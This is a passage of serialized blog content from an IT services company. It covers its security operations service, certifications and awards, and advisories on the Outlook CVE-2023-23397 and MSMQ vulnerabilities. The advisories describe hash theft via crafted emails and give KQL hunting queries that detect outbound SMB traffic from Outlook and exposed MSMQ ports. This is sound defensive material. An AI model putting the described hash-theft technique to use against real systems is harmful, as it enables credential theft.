can be done.",[12,3507,3508,3509,3512],{},"As part of the school's closure to curb the proliferation of COVID-19, students in the tablet classes will receive ",[251,3510,3511],{},"remote teaching with Microsoft Teams"," in specific subjects through videoconferencing, document sharing, and assignment delivery.",[12,3514,3515,3519],{},[2642,3516],{"alt":3517,"src":3518},"Teaching unit in mathematics","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-teams-unterricht.jpg",[3456,3520,3517],{},{"title":65,"searchDepth":111,"depth":111,"links":3522},[],{"lang":2171,"categories":3524,"blogtitlepic":3525,"socialimg":3526,"customExcerpt":3409},[2810],"head-future-workplace-at-school","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-future-workplace-at-school.jpg","2020-03-20","/posts/2020-03-18-modern-workplace-at-school",{"title":3401,"description":3409},"posts/2020-03-18-modern-workplace-at-school",[2810,2824,2677,3532,2677,2824,3533],"Teams","Collaboration","V7qrGpM2QRvbz8KnvAL0d2a8SYzE8FZVlsNmvTyeQt4",{"id":3536,"title":3537,"author":2209,"body":3538,"cta":2166,"description":3544,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3651,"moment":3655,"navigation":2181,"path":3656,"seo":3657,"stem":3658,"tags":3659,"webcast":2168,"__hash__":3662},"content_en/posts/2020-05-18-anniversary-csoc.md","First anniversary of the Cloud Security Operations Center",{"type":9,"value":3539,"toc":3645},[3540,3545,3548,3559,3562,3569,3572,3576,3583,3587,3594,3598,3605,3611,3618,3625,3631,3638,3642],[12,3541,3542],{},[251,3543,3544],{},"The Modern Workplace Client requires modern security solutions. Microsoft provides first-class tools that provide all the information needed to respond quickly to threats. However, many companies do not have the time to study these instruments in depth, let alone the manpower to monitor them continuously. That's why we launched our Managed Service Cloud Security Operations Center (CSOC) a year and a half ago. Time for a bottom line.",[12,3546,3547],{},"The CIO of a large company said in front of me that he had bought a fitness bike for Christmas and put it in the basement. The only problem is that he never goes to the basement.",[12,3549,3550,3551,3554,3555,3558],{},"In our ",[251,3552,3553],{},"100% Cloud projects"," we can convince our customers that a Modern Workplace client needs ",[251,3556,3557],{},"modern security solutions",". Microsoft combines these cloud security tools in the 'E5 Security' license. The use of these tools is beyond question for most customers, so that the modern workplace, cloud services, data and identities are equally well protected from any location.",[12,3560,3561],{},"However, after an initial enthusiasm about what can be discovered with these security tools, disillusionment quickly follows, as many employees in companies usually lack the time to study these tools in depth, not to mention the lack of manpower to constantly monitor them. This is quite understandable, as almost all IT departments I know are typically overloaded. And yet the fitness bike in the basement only serves its purpose when it is in use.",[12,3563,3564,3565,3568],{},"With this in mind, we started designing the architecture for our ",[251,3566,3567],{},"Managed Service 'Cloud Security Operations Center (CSOC)'"," about a year and a half ago. Because we realized that over time, more and more customers are turning to modern cloud security, but need support.",[12,3570,3571],{},"Among other things, we build on the following precepts:",[186,3573,3575],{"id":3574},"_1-microsoft-native","1. Microsoft Native",[12,3577,3578,3579,3582],{},"Those who have studied the cloud know that change is its middle name. This is especially important in the context of security, in order to be able to constantly meet new threats, but it can also mean that connectors and custom software have to be regularly adapted. Here we rely on ",[251,3580,3581],{},"native Microsoft solutions"," and are in constant, close contact with the respective product groups in Israel and Redmond. We provide continuous feedback and thus have direct influence on product development - which in turn benefits our customers.",[186,3584,3586],{"id":3585},"_2-no-man-is-an-island","2. No Man Is an Island",[12,3588,3589,3590,3593],{},"Our customers benefit from the knowledge gained in other customer environments. For example, if we discover a new method of attack, we develop special ",[251,3591,3592],{},"hunting queries"," for it, which we then use in all environments.",[186,3595,3597],{"id":3596},"_3-creating-more-customer-value","3. Creating More Customer Value",[12,3599,3600,3601,3604],{},"Everything we report to our customers must create more value for them. The customer doesn't have time to read many pages of security reports. Instead, we focus on ",[251,3602,3603],{},"one-page reports"," that are suitable for the management and discuss them in detail:",[12,3606,3607],{},[2642,3608],{"alt":3609,"src":3610},"CSOC Report","https://res.cloudinary.com/c4a8/image/upload/illus/img-csoc-report.jpg",[12,3612,3613,3614,3617],{},"This approach has developed into ",[251,3615,3616],{},"intensive cooperation"," between the CSOC of Glück & Kanja and the SecOps departments of our customers. Every month we discuss incidents and possible improvements. And we also support the implementation of these suggested improvements. That is the key!",[12,3619,3620,3621,3624],{},"In the meantime, we successfully apply these guidelines to several customers every day. During this time we have ",[251,3622,3623],{},"prevented or interrupted"," numerous attacks. We have analyzed assaults forensically and drawn conclusions on how to prevent them in the future. In the process, we have developed tools and procedures that help all our customers.",[12,3626,3627,3628,1013],{},"The daily work consists on the one hand of routine tasks and on the other hand of exciting research in case of attacks by hacker groups. As soon as an interesting case comes up, several specialists put their heads together to reconstruct what happened. We try to reduce the monotonous tasks by constantly improving our processes and automation. Our own service is also lived ",[251,3629,3630],{},"evergreen",[12,3632,3633,3634,3637],{},"In addition to incident response and incident analysis for malware, phishing and identity attacks, we have significantly improved the ",[251,3635,3636],{},"Security Posture"," of our CSOC customers. For example, we were able to increase the Microsoft Secure Score at one customer to 169% within 3 months and thus greatly optimize his security landscape.",[41,3639,3641],{"id":3640},"prospects","Prospects",[12,3643,3644],{},"As already mentioned: safe is not safe. That is why we are in the process of extending the services of the CSOC to other areas, for example to the Azure Security Center. We are also constantly questioning the alerts and sensors that are monitored on a daily basis and are prepared to adapt them if necessary. This allows us to keep our service 'new' and 'fresh' to be perfectly prepared for unknown threats.",{"title":65,"searchDepth":111,"depth":111,"links":3646},[3647,3648,3649,3650],{"id":3574,"depth":329,"text":3575},{"id":3585,"depth":329,"text":3586},{"id":3596,"depth":329,"text":3597},{"id":3640,"depth":111,"text":3641},{"lang":2171,"categories":3652,"blogtitlepic":3653,"socialimg":3654,"customExcerpt":3544},[2176],"head-csoc-celebration","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-csoc-celebration.jpg","2020-05-18","/posts/2020-05-18-anniversary-csoc",{"title":3537,"description":3544},"posts/2020-05-18-anniversary-csoc",[2176,3660,3661],"CSOC","Cloud","idhk6vSC_A8SOPu8bvEIt2zcrM0rB-SYiIqcYuvulqs",{"id":3664,"title":3665,"author":2461,"body":3666,"cta":2166,"description":3672,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3726,"moment":3731,"navigation":2181,"path":3732,"seo":3733,"stem":3734,"tags":3735,"webcast":2168,"__hash__":3736},"content_en/posts/2020-07-13-gk-microsoft-partner-of-the-year.md","Glueck & Kanja is Microsoft Partner of the Year Finalist Security",{"type":9,"value":3667,"toc":3724},[3668,3673,3683,3689,3698,3704,3715,3718],[12,3669,3670],{},[251,3671,3672],{},"Glueck & Kanja Consulting AG is recognized as Microsoft Partner of the Year Finalist 'Security and Compliance'.",[12,3674,3675,3676,3679,3680,1013],{},"Microsoft today announced that Glueck & Kanja Consulting AG, one of the leading IT consulting companies and one of the Top Microsoft Partners in Germany, has been selected as ",[251,3677,3678],{},"Finalist for the Microsoft Partner of the Year Award 2020 in the category 'Security and Compliance'",". After 2017 and 2019, the company was once again able to compete against a strong field of participants among the worldwide Microsoft partners. These are the best prerequisites for the recently announced merger with GAB to form the Cloud Managed Service Provider ",[251,3681,3682],{},"glueckkanja AG",[12,3684,3685],{},[2642,3686],{"alt":3687,"src":3688},"Microsoft Partner of the Year Award 2020 Finalist","https://res.cloudinary.com/c4a8/image/upload/logos/ms-logo-2020POYFinalist.png",[12,3690,3691,3692,3697],{},"Christian Kanja, CEO of Glueck & Kanja, is glad about the repeated award from Redmond: \"We are very happy that our ",[2672,3693,3696],{"href":3694,"rel":3695},"https://glueckkanja.com/de/portfolio/cloud-security-operations-center/",[2676],"Cloud Security Operations Center (CSOC)"," convinced the Microsoft jury. With our 100 % Cloud Blueprint architecture combined with the extensive Microsoft E5 security stack, we can not only provide a cloud-managed workplace, but also provide it with an always up-to-date and seamless cloud security strategy\".",[12,3699,399,3700,3703],{},[251,3701,3702],{},"CSOC Managed Service"," delivers multi-tenant analyses and guarantees fast 24x7 response times for all types of security incidents through its proprietary Companion components developed by Glueck & Kanja based on the Microsoft Graph API. The international energy company UNIPER, among others, chose this service for its almost 12,000 Windows 10 Modern Workplace Clients and the security of Azure AD Identity Protection, Office ATP, Defender ATP, TVM and MCAS.",[12,3705,3706,3707,3710,3711,3714],{},"In addition to regular threats, an unexpected ",[251,3708,3709],{},"challenge for the CSOC service"," occurred as COVID-19 continued to spread. Most of UNIPER's 12,000 workstations now operate remotely, and the protection provided by Microsoft 365 security tools would have been impossible in traditional infrastructures. \"In this time of the ",[251,3712,3713],{},"COVID-19 pandemic",", we need to ensure the security of our entire Microsoft 365 infrastructure and workstations. That's why we appreciate even more the support provided by the Cloud Security Operations Center of Glueck & Kanja. It offers continuous monitoring of overall security, handling cyber threats and continuously brings in sustainable improvements,\" says Tilmann Proske, Head of Enterprise Information Security at UNIPER.",[12,3716,3717],{},"\"We are honored to recognize the winners and finalists of the 2020 Microsoft Partner of the Year Awards,\" said Gavriella Schuster, Corporate Vice President, One Commercial Partner, Microsoft.",[12,3719,399,3720,3723],{},[251,3721,3722],{},"Microsoft Partner of the Year Award"," is given annually to Microsoft partners who have proven themselves with innovative and particularly successful solutions and projects.",{"title":65,"searchDepth":111,"depth":111,"links":3725},[],{"lang":2171,"categories":3727,"blogtitlepic":3728,"socialimg":3729,"customExcerpt":3730},[2962],"head-csoc-discussion","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-csoc-discussion.jpg","Microsoft announced that the Glueck & Kanja Consulting AG is finalist for the Microsoft Partner of the Year Award 2020 in the category 'Security and Compliance'. The company has convinced the Microsoft jury with its Cloud Security Operations Center.","2020-07-13 02:00:00 +0200","/posts/2020-07-13-gk-microsoft-partner-of-the-year",{"title":3665,"description":3672},"posts/2020-07-13-gk-microsoft-partner-of-the-year",[2972,2973,2971],"tWU2UJO3RjSQNMN6JGkf_GvayZq4Wc_SL3vARN9UbfI",{"id":3738,"title":3739,"author":3740,"body":3741,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3793,"moment":3798,"navigation":2181,"path":3799,"seo":3800,"stem":3801,"tags":3802,"webcast":2168,"__hash__":3806},"content_en/posts/2022-01-19-we-are-certified.md","Successfully ISO 27001 certified - in only 10 months",[2380],{"type":9,"value":3742,"toc":3788},[3743,3747,3750,3753,3757,3760,3763,3766,3775,3778,3782,3785],[41,3744,3746],{"id":3745},"what-is-iso-27001-certification-about","What is ISO 27001 certification about?",[12,3748,3749],{},"An information security management system, or ISMS for short, is less concerned with technology than with describing rules and organizational measures for holistic corporate and IT security management. The implementation is in turn based on technical and organizational rules in the previously defined areas (in our case: managed services and product development).",[12,3751,3752],{},"Our goal was to be ISO 27001 certified in the above-mentioned areas by the end of 2021 - in just 10 months! For this, we were ridiculed from various sides, because the introduction of an ISMS and the certification mean a significant amount of time.",[41,3754,3756],{"id":3755},"what-kind-of-implementation-did-we-choose","What kind of implementation did we choose?",[12,3758,3759],{},"As a company, we think a little differently. We didn't want to reinvent the wheel, but rather rely on people who see accompanying such a process as their core competence. That's why we chose an \"off-the-shelf\" system, where the framework was already given and we just had to fill it with life.",[12,3761,3762],{},"As already mentioned, the implementation is based on technical and organizational rules. This is where our 100% cloud strategy and our Future Workplace Blueprint play into our hands. Because one of our maxims is to \"eat your own dog food\". We therefore live in the cloud and the Blueprint is also being implemented within our company. Thus, many of the topics required in the framework could be referenced to the Blueprint or requirements could be answered with it.",[12,3764,3765],{},"The ISMS also takes a look at the area of corporate security. Among other things, it examines how business-critical situations are handled, e.g. power or internet outages. In our case, there were some exciting discussions with the auditor during the certification process, as these topics do not directly affect us. After all, thanks to our 100% cloud approach, our motto is: \"Power gone, no matter - then I go where the power is. No internet, never mind - personal hotspot on mobile, off to the café around the corner or, boringly, home office.\"",[12,3767,3768,3769,3774],{},"ISO 27001 certification also includes an assessment of the business facilities and infrastructure (data center). This might take up to an entire day. In our case, the assessment was completed within an hour. Why? Quite simple: 100% cloud. And since we use the Microsoft Cloud, ",[2672,3770,3773],{"href":3771,"rel":3772},"https://docs.microsoft.com/de-de/compliance/regulatory/offering-iso-27001",[2676],"which is already ISO 27001 certified",", this point was quickly taken care of as well.",[12,3776,3777],{},"However, this raised further questions. If all the infrastructure is in the cloud, how is access secured and access monitored? We were again able to refer to our Blueprint, which also addresses the issue of conditional access. In terms of monitoring, we convinced with our glueckkanja CSOC service and eliminated the last doubts. Thus, we were ready for the final certification.",[41,3779,3781],{"id":3780},"so-what-conclusion-can-we-draw","So what conclusion can we draw?",[12,3783,3784],{},"With our technical knowledge, which we put into our Blueprint, we also created the basis to convince on the organizational side. This enabled us to achieve ISO 27001 certification in a very short time and with manageable effort.",[12,3786,3787],{},"From now on, we can tick questions about an ISMS or certification with a clear conscience when we receive inquiries about managed services. And you as a customer can also benefit from our 100% cloud approach, because the standardized approach can also help you in your company with issues such as information and business security.",{"title":65,"searchDepth":111,"depth":111,"links":3789},[3790,3791,3792],{"id":3745,"depth":111,"text":3746},{"id":3755,"depth":111,"text":3756},{"id":3780,"depth":111,"text":3781},{"lang":2171,"categories":3794,"blogtitlepic":3795,"socialimg":3796,"customExcerpt":3797},[2962],"head-iso-27001","blog/heads/head-iso-27001.jpg","We prove to our customers every day on a technical level that we offer them first-class support as a cloud managed service provider; now it was time to check whether the organizational requirements were also met. At glueckkanja, we are receiving more and more requests from customers who want proof that our company has established industry-standard processes for information security. To meet this requirement, we have had ourselves certified in accordance with ISO 27001.","2022-01-19","/posts/2022-01-19-we-are-certified",{"title":3739,"description":65},"posts/2022-01-19-we-are-certified",[2962,2176,3803,3804,3805],"ISO 27001","Information Security","Certification","G__HQduXLbLco09kcLMsCghM7PWXCuT6hEu8yuzkOpY",{"id":3808,"title":3809,"author":3810,"body":3811,"cta":2166,"description":3815,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3831,"moment":3838,"navigation":2181,"path":3839,"seo":3840,"stem":3841,"tags":3842,"webcast":2168,"__hash__":3844},"content_en/posts/2022-10-18-csoc-managed-xdr-solution.md","glueckkanja recognized with Microsoft verified MXDR solution status",[2461],{"type":9,"value":3812,"toc":3829},[3813,3816,3823,3826],[12,3814,3815],{},"Yeah! As one of currently only three partners worldwide, glueckkanja has received Microsoft Verified Managed Extended Detection and Response (MXDR) solution status. This award is the best proof of our reliable MXDR services offering, including our Security Operation Center (SOC) with 24/7/365 proactive hunting, monitoring and response capabilities all built on tight integrations with the Microsoft Security platform. This solution combines expert-trained technology with human-led services and has been verified by Microsoft engineers.",[3817,3818],"v-img",{":img":3819,":alt":3820,":cloudinary":3821,"img-src-sets":3822},"quote.img","quote.alt","true","quote",[12,3824,3825],{},"\"With malicious attacks on the rise, we understand security is front and center for our customers. That is why I am excited to congratulate glueckkanja on achieving Microsoft Verified: Managed Extended Detection and Response solution status. Their solution closely integrates with Microsoft 365 Defender and Microsoft Sentinel and has been verified by Microsoft Security engineering to ensure that it provides comprehensive service coverage across the Microsoft Security portfolio.\" – Rob Lefferts, Corporate Vice President, Threat Protection, Microsoft",[12,3827,3828],{},"glueckkanja AG is part of the Microsoft Intelligent Security Association (MISA). “The Microsoft Intelligent Security Association is comprised of some the most reliable and trusted security companies across the globe”, said Maria Thomson, Microsoft Intelligent Security Association Lead. “Our members share Microsoft’s commitment to collaboration within the cybersecurity community to improve our customers’ ability to predict, detect, and respond to security threats faster. We’re thrilled to recognize and welcome glueckkanja's MXDR solution to the MISA portfolio.",{"title":65,"searchDepth":111,"depth":111,"links":3830},[],{"lang":2171,"categories":3832,"blogtitlepic":3833,"socialimg":3834,"customExcerpt":3835,"quote":3836},[2176],"head-mxdr-verification","/blog/heads/head-mxdr-verification.jpg","glueckkanja has achieved Microsoft verified Managed Extended Detection and Response (MXDR) solution status. By achieving this status, we have proven our robust MXDR services including our Security Operation Center (SOC) with 24/7/365 proactive hunting, monitoring, and response capabilities all built on tight integrations with the Microsoft Security platform.",{"img":3837,"alt":2209},"/blog/pics/quote-jan-geisbauer-en.png","2022-10-18","/posts/2022-10-18-csoc-managed-xdr-solution",{"title":3809,"description":3815},"posts/2022-10-18-csoc-managed-xdr-solution",[2176,3660,3843],"MXDR","l20KyU3wpz4DAUMsjlctx1FouLVgp4HFxIS4CITPJkk",{"id":3846,"title":3847,"author":3848,"body":3849,"cta":2166,"description":3853,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4019,"moment":4024,"navigation":2181,"path":4025,"seo":4026,"stem":4027,"tags":4028,"webcast":2168,"__hash__":4030},"content_en/posts/2023-03-16-outlook-vulnerability.md","Zero-Day Exploit in Outlook enables theft of Net-NTLMv2 hash",[2302,2494],{"type":9,"value":3850,"toc":4016},[3851,3854,3857,3865,3868,3875,3882,3889,3896,3899,3906,3914,3917,3926,3929,3985,3990,3994],[12,3852,3853],{},"Microsoft has confirmed on Tuesday that a critical Outlook security vulnerability, rated 9.8 out of a maximum of 10 points, is already being exploited in the wild (Zero-Day). What's dangerous about this exploit is that it executes as soon as a malicious email is delivered to Outlook. The email does not need to be opened to exploit the vulnerability, so no additional user activity is required. With a manipulated email, an attacker can specifically target a server under their control and thereby capture the Net-NTLMv2 hash of the logged-in user. The stolen information can then be used for further attacks against the user's on-premises infrastructure.",[12,3855,3856],{},"The most important measure to address this exploit is to immediately update the Office package. The following update measures are possible:",[1254,3858,3859,3862],{},[1257,3860,3861],{},"The user checks for updates in Office themselves: (File \\ Office Account \\ Update Options > Update Now)",[1257,3863,3864],{},"In a modern workplace environment, we use Office update policies. Office can be managed using Intune or GPOs. We recommend using the deployment deadline setting.",[12,3866,3867],{},"We will show you how to achieve basic settings for quickly updating Office applications using Intune. These instructions are not complete but focus on quickly installing updates.",[12,3869,3870,3871],{},"In the Intune portal, open the Devices section.\nClick on \"Configuration profiles\" and then \"Create profile\".\nChoose \"Windows 10 and later\" as the platform and \"Templates\" as the type.\nThen click on \"Administrative Templates\".\n",[2642,3872],{"alt":3873,"src":3874},"Configuration Profiles","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-01.png",[12,3876,3877,3878],{},"Assign an appropriate (any) name.\n",[2642,3879],{"alt":3880,"src":3881},"Create Profiles","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-02.png",[12,3883,3884,3885],{},"In the search bar, enter \"Update Deadline\" and then click on the entry.\nActivate the setting and set a deadline. This can be a number of days or a specific time. Click \"OK\" (and not \"Next\").\n",[2642,3886],{"alt":3887,"src":3888},"Update Deadline","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-03.png",[12,3890,3891,3892],{},"Now enter \"Enable Automatic Updates,\" click on the entry again, and activate this setting. Please confirm with \"OK\" and now click on \"Next\".\n",[2642,3893],{"alt":3894,"src":3895},"Enable Automatic Update","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-04.png",[12,3897,3898],{},"Scope tags are not required, so you can skip this tab with \"Next.\"",[12,3900,3901,3902],{},"As an assignment, you must now select a group that includes all your Windows devices to be updated.\n",[2642,3903],{"alt":3904,"src":3905},"Add Groups","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-05.png",[12,3907,3908,3909,3913],{},"Click on \"Next\" one last time, and a summary will be shown.\n",[2642,3910],{"alt":3911,"src":3912},"Review + Create","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-cve-06.png","\nWith \"Create,\" the Intune Administrative Template is created and applied to the group's computers.",[12,3915,3916],{},"If your company is unable to roll out these security updates immediately, or if you want to take additional measures until a successful rollout, it is recommended to block outgoing network traffic to Internet IP addresses for the SMB protocol (TCP 445) with a firewall or through VPN settings. This prevents information from flowing to the attacker.\nThis can also be done on the endpoint itself using the Microsoft Defender Firewall.",[12,3918,3919,3920,3925],{},"To check if your environment was the target of this attack, it is recommended to run ",[2672,3921,3924],{"href":3922,"rel":3923},"https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/",[2676],"Microsoft's script"," on Exchange Online or Exchange on-premises. It checks all mailboxes for suspicious messages.",[12,3927,3928],{},"If you are using Microsoft Defender for Endpoint, you can use the following Advanced Hunting Query to detect corresponding network connections in your environment:",[52,3930,3932,3933,3935,3936,3940,3941,3945,3949,540,3951,3935,3953,3955,3956,540,3960,3964,3965,540,3968,3935,3970,3972,3973,540,3976,3978,3979,3982,3983],{"style":3931},"background-color:#000000; font-family: 'Source Code Pro', 'Courier New', monospace; padding: 15px; color: #ffffff","\nDeviceNetworkEvents ",[531,3934],{},"\n| ",[102,3937,3939],{"style":3938},"color: #569CD6;","where"," Timestamp > ",[102,3942,3944],{"style":3943},"color: #E6DB74;","ago(",[102,3946,3948],{"style":3947},"color: #A6E22E;","30d",[102,3950,1288],{"style":3943},[531,3952],{},[102,3954,3939],{"style":3938}," RemoteIPType == ",[102,3957,3959],{"style":3958},"color: #D69D85;","\"Public\"",[102,3961,3963],{"style":3962},"color: #F92672;","and"," RemotePort == ",[102,3966,3967],{"style":3958},"\"445\"",[531,3969],{},[102,3971,3939],{"style":3938}," InitiatingProcessVersionInfoOriginalFileName =~ ",[102,3974,3975],{"style":3958},"\"outlook.exe\"",[531,3977],{},"\n  ",[102,3980,3981],{"style":3962},"or"," InitiatingProcessParentFileName =~ ",[102,3984,3975],{"style":3958},[52,3986],{"className":3987},[3988,3989],"container","space-bottom-2",[41,3991,3993],{"id":3992},"further-links","Further links:",[1254,3995,3996,4002,4009],{},[1257,3997,3998],{},[2672,3999,4001],{"href":3922,"rel":4000},[2676],"CVE-2023-23397 script",[1257,4003,4004],{},[2672,4005,4008],{"href":4006,"rel":4007},"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397",[2676],"Microsoft Outlook Elevation of Privilege Vulnerability",[1257,4010,4011],{},[2672,4012,4015],{"href":4013,"rel":4014},"https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2023-exchange-server-security-updates/ba-p/3764224",[2676],"Released: March 2023 Exchange Server Security Updates",{"title":65,"searchDepth":111,"depth":111,"links":4017},[4018],{"id":3992,"depth":111,"text":3993},{"lang":2171,"DISABLEDtitleClass":2173,"categories":4020,"blogtitlepic":4021,"socialimg":4022,"customExcerpt":4023},[2176],"head-outlook-sicherheitsluecke","/blog/heads/head-outlook-sicherheitsluecke.jpg","Microsoft confirmed a critical vulnerability in Outlook that is already being used by attackers to steal the Net-NTLMv2 hash from users. Once activated by a malicious email, this exploit allows further attacks on the victim. Microsoft recommends updating the Office package to fix the vulnerability. Various update options are available for this purpose.","2023-03-16","/posts/2023-03-16-outlook-vulnerability",{"title":3847,"description":3853},"posts/2023-03-16-outlook-vulnerability",[2176,4029,3660],"Vulnerablity","ga9u-vDELyoZXaWWzoLKycdWacsBjiqyLs7Ruj-a7s8",{"id":4032,"title":4033,"author":4034,"body":4035,"cta":2166,"description":4039,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4147,"moment":4155,"navigation":2181,"path":4156,"seo":4157,"stem":4158,"tags":4159,"webcast":2168,"__hash__":4160},"content_en/posts/2023-04-12-critical-vulnerability.md","Critical Vulnerability in MSMQ Service",[2494],{"type":9,"value":4036,"toc":4144},[4037,4040,4043,4046,4049,4091,4094,4097,4121,4124,4128],[12,4038,4039],{},"As part of yesterday's Microsoft Patch Tuesday, a critical security vulnerability in the \"Microsoft Message Queuing\" service was fixed. This security vulnerability allows an attacker to execute code without having to authenticate on the target system.",[12,4041,4042],{},"Currently, there is no publicly available exploit code, but this is expected to change quickly in the coming days. This is the opinion of both Microsoft and the security researchers who discovered the flaw.",[12,4044,4045],{},"Since this Windows feature is also installed in conjunction with other software products (e.g., Exchange, SQL Server SSPI), more systems may be affected than initially thought. Immediate assistance can be provided by the Microsoft patch or, as a workaround, by blocking incoming network connections to TCP/1801.",[12,4047,4048],{},"With the following advanced hunting query, you can search your own environment for vulnerable systems.",[52,4050,3932,4051,3935,4053,3940,4055,4057,4059,540,4061,3935,4063,4065,4066,4069,3935,4071,4073,4074,540,4077,3935,4079,4081,4082,540,4085,3935,4087,4090],{"style":3931},[531,4052],{},[102,4054,3939],{"style":3938},[102,4056,3944],{"style":3943},[102,4058,3948],{"style":3947},[102,4060,1288],{"style":3943},[531,4062],{},[102,4064,3939],{"style":3938}," ActionType == ",[102,4067,4068],{"style":3958},"\"ListeningConnectionCreated\"",[531,4070],{},[102,4072,3939],{"style":3938}," LocalPort == ",[102,4075,4076],{"style":3958},"\"1801\"",[531,4078],{},[102,4080,3939],{"style":3938}," InitiatingProcessVersionInfoOriginalFileName has ",[102,4083,4084],{"style":3958},"\"MQSVC\"",[531,4086],{},[102,4088,4089],{"style":3938},"summarize by"," DeviceName\n",[52,4092],{"className":4093},[3988,3989],[12,4095,4096],{},"Alternatively, if the network port has been changed, the query is:",[52,4098,4099,4100,3935,4102,3940,4104,4106,4108,540,4110,3935,4112,4114,4115,540,4117,3935,4119,4090],{"style":3931},"\nDeviceProcessEvents ",[531,4101],{},[102,4103,3939],{"style":3938},[102,4105,3944],{"style":3943},[102,4107,3948],{"style":3947},[102,4109,1288],{"style":3943},[531,4111],{},[102,4113,3939],{"style":3938}," ProcessVersionInfoOriginalFileName has ",[102,4116,4084],{"style":3958},[531,4118],{},[102,4120,4089],{"style":3938},[52,4122],{"className":4123},[3988,3989],[41,4125,4127],{"id":4126},"sources","Sources:",[1254,4129,4130,4137],{},[1257,4131,4132],{},[2672,4133,4136],{"href":4134,"rel":4135},"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554",[2676],"Microsoft Message Queuing Remote Code Execution Vulnerability",[1257,4138,4139],{},[2672,4140,4143],{"href":4141,"rel":4142},"https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/",[2676],"QueueJumper: Critical Unauthenticated RCE Vulnerability in MSMQ Service",{"title":65,"searchDepth":111,"depth":111,"links":4145},[4146],{"id":4126,"depth":111,"text":4127},{"lang":2171,"DISABLEDtitleClass":2173,"categories":4148,"blogtitlepic":4149,"socialimg":4150,"customExcerpt":4151,"hreflang":4152},[2176],"head-critical-vulnerability","/blog/heads/head-critical-vulnerability.jpg","Microsoft's Patch Tuesday fixed a critical vulnerability in the Message Queuing Service. This vulnerability allowed an attacker to execute code without authentication. A possible public exploit is imminent. It is recommended to quickly close the gap or block incoming network connections.",[4153],{"lang":2260,"href":4154},"/blog/security/csoc/event/2023/04/critical-vulnerability","2023-04-12","/posts/2023-04-12-critical-vulnerability",{"title":4033,"description":4039},"posts/2023-04-12-critical-vulnerability",[2176,4029,3660],"-IM--UdCx0Z6k8B9U6imPq4xdIx1otsWJ6wDjuhqyls",{"id":4162,"title":4163,"author":4164,"body":4165,"cta":2166,"description":4169,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4230,"moment":4239,"navigation":2181,"path":4240,"seo":4241,"stem":4242,"tags":4243,"webcast":2168,"__hash__":4246},"content_en/posts/2023-04-24-azure-virtual-desktop.md","Azure Virtual Desktop - Yes, but automated please!",[2401],{"type":9,"value":4166,"toc":4225},[4167,4170,4173,4177,4180,4184,4188,4191,4199,4203,4206,4209,4212,4215,4218,4222],[12,4168,4169],{},"Azure Virtual Desktop is by no means a new service, but in our experience it is an Azure service that fills many gaps and is very popular with our customers. Setting up an AVD environment \"quickly\" is certainly not a problem for an engineer who is familiar with Azure. But where does it go from there? What normally starts as a test environment soon becomes a workload in productive use, which thus also has completely different requirements for secure and stable operation.",[12,4171,4172],{},"Microsoft itself offers many functions that make this quite easy. However, the use cases are very different and for some aspects there are no automation solutions yet. For example, the use cases for Pooled AVD and Personal AVD are usually fundamentally different. But in order to provide a holistic, standardized and reproducible solution, we believe that the use of Infrastructure-as-Code (IaC) is a necessity.",[186,4174,4176],{"id":4175},"iac-and-terraform-for-avd-foundation","IaC and Terraform for AVD Foundation",[12,4178,4179],{},"Similar to our Azure Foundation, we also use Infrastructure-as-Code (IaC) based on Terraform for the deployment of the AVD Foundation. This allows us to quickly build the perfect-fit AVD environment in a standardized way, depending on the customer specific setup. During a parameterization workshop, the needs and wishes are determined, the existing infrastructure is analyzed and the required parameters for the deployment are compiled. In this way, we can provide an AVD Personal Host environment for productive deployment at the customer's site within a few days. With the Pooled AVD approach, we also offer an automated solution together with Image Factory, which implements image management on a code basis as well as enabling the management of the AVD environment itself.",[2642,4181],{"src":4182,"alt":4183},"https://res.cloudinary.com/c4a8/image/upload/v1681647046/blog/pics/img-avd-foundation-layer-concept.png","AVD Foundation Layer Concept",[186,4185,4187],{"id":4186},"personal-pools","Personal Pools",[12,4189,4190],{},"For personal hosts, which are treated similarly to users' physical workstations, the AVD Foundation focuses primarily on providing the necessary infrastructure in Azure. In a multi-layered approach, not only monitoring solutions are implemented, but also hosts, pools, workspaces and applications are provided. The Windows image directly from the Microsoft Marketplace serves as the basis.",[12,4192,4193,4194,4198],{},"Software installation and configuration on the provisioned hosts is done via a client management solution, in our case Intune and ",[2672,4195,2677],{"href":4196,"rel":4197},"https://www.realmjoin.com/",[2676],", which is strongly oriented towards autopilot deployment of physical clients. For cost-optimized operations, we also provide the ability to idle hosts using Azure Functions to reduce infrastructure costs - a feature not yet offered by AVD's current scaling plans. This can significantly reduce the cost of personal hosts without having to rely on reservations.",[186,4200,4202],{"id":4201},"pooled-pools","Pooled Pools",[12,4204,4205],{},"The Pooled Hosts approach is more closely aligned with the classic terminal server approach. In order to fully exploit the flexibility and scalability of AVD compared to legacy desktop virtualization solutions, we rely on so-called golden images for Pooled Hosts. These make it possible to deploy standardized hosts on demand in the least amount of time. The fully automated creation of these golden images is done with the help of our Image Factory, where the image can be parameterized and configured.",[12,4207,4208],{},"Especially interesting is the automated software installation during the imaging process by RealmJoin. The manual creation and storage of software packages is no longer necessary; instead, a pool of over 1,000 ready-to-use software packages can be accessed or individual packages can be used. The simultaneous use of RealmJoin for standard clients 